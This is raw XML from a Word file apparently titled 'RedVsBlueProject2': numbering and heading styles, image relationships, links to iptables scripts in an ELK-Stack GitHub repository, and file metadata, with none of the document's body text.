        <w:ind w:left="8411" w:hanging="289"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="86E2354E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="9793" w:hanging="289"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="3DDC9BA2">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="11175" w:hanging="289"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7CE06D56"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="756E7918"/>
    <w:lvl w:ilvl="0" w:tplc="FA74BBB2">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1212" w:hanging="289"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:spacing w:val="-11"/>
        <w:w w:val="99"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="20084C28">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2492" w:hanging="289"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="10667EFE">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3764" w:hanging="289"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="7C9A9E74">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5036" w:hanging="289"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="62D61792">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6308" w:hanging="289"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="979EF61C">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7580" w:hanging="289"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="3A4A9802">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8852" w:hanging="289"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="F830DB08">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="10124" w:hanging="289"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="550407FC">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="11396" w:hanging="289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979"/>
    <w:rsid w:val="000A2543"/>
    <w:rsid w:val="0022470B"/>
    <w:rsid w:val="00377979"/>
    <w:rsid w:val="006B1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6C7C9"/>
  <w15:docId w15:val="{98F57527-B646-438E-A4D0-7881B1611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Regular" w:eastAsia="RobotoRegular" w:hAnsi="RobotoRegular" w:cs="RobotoRegular"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="13" w:line="907" w:lineRule="exact"/>
      <w:ind w:left="457" w:right="556"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
      <w:b/>
      <w:b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ind w:left="457" w:right="562"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"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spacing w:before="23"/>
      <w:ind w:left="3445" w:right="3551" w:hanging="4"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
      <w:sz w:val="68"/>
      <w:szCs w:val="68"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="23"/>
      <w:ind w:left="457"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="48"/>
      <w:szCs w:val="48"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="75"/>
      <w:ind w:left="420"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:sz w:val="48"/>
      <w:szCs w:val="48"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading6">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="43"/>
      <w:ind w:left="1362"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading7">
    <w:name w:val="heading 7"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="997"/>
      <w:outlineLvl w:val="6"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto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486" w:hanging="290"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableParagraph">
    <w:name w:val="Table Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="106"/>
      <w:ind w:left="284"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Robo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7.jpeg"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/dbaimakov/ELK-Stack_project_1/blob/main/Scripts/OUTPUTiptablets.sh" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image51.jpeg"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4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5.jpe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8.jpeg"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.jpeg"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.jpeg"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/dbaimakov/ELK-Stack_project_1/blob/main/Scripts/INPUTiptablescript.sh" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33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43.jpeg"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.jpeg"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.jpeg"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.jpeg"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20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2.jpeg"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.jpeg"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.png"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.jpeg"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image49.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.jpeg"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/dbaimakov/ELK-Stack_project_1/blob/main/Scripts/OUTPUTiptablets.sh" TargetMode="External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hyperlink" Target="https://github.com/dbaimakov/ELK-Stack_project_1/blob/main/Scripts/OUTPUTiptablets.sh" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.jpeg"/><Relationship Id="rId67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38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5.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.jpeg"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.jpeg"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/dbaimakov/ELK-Stack_project_1/blob/main/Scripts/INPUTiptablescript.sh" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image45.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.jpeg"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.jpeg"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/dbaimakov/ELK-Stack_project_1/blob/main/Scripts/INPUTiptablescript.sh" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/dbaimakov/ELK-Stack_project_1/blob/main/Scripts/OUTPUTiptablets.sh" TargetMode="External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5.jpeg"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.jpeg"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/dbaimakov/ELK-Stack_project_1/blob/main/Scripts/INPUTiptablescript.sh" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.jpeg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.jpe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1030</Words>
  <Characters>5877</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>48</Lines>
  <Paragraphs>13</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>6894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RedVsBlueProject2.pptx</dc:title>
  <dc:creator>OSAGIE AYO EKHAGUERE</dc:creator>
  <cp:lastModifiedBy>OSAGIE AYO EKHAGUERE</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-11-30T10:27:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-11-30T10:27:00Z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LastSaved">
    <vt:filetime>2021-11-30T00:00:00Z</vt:filetime>
  </property>
</Properties>
</file>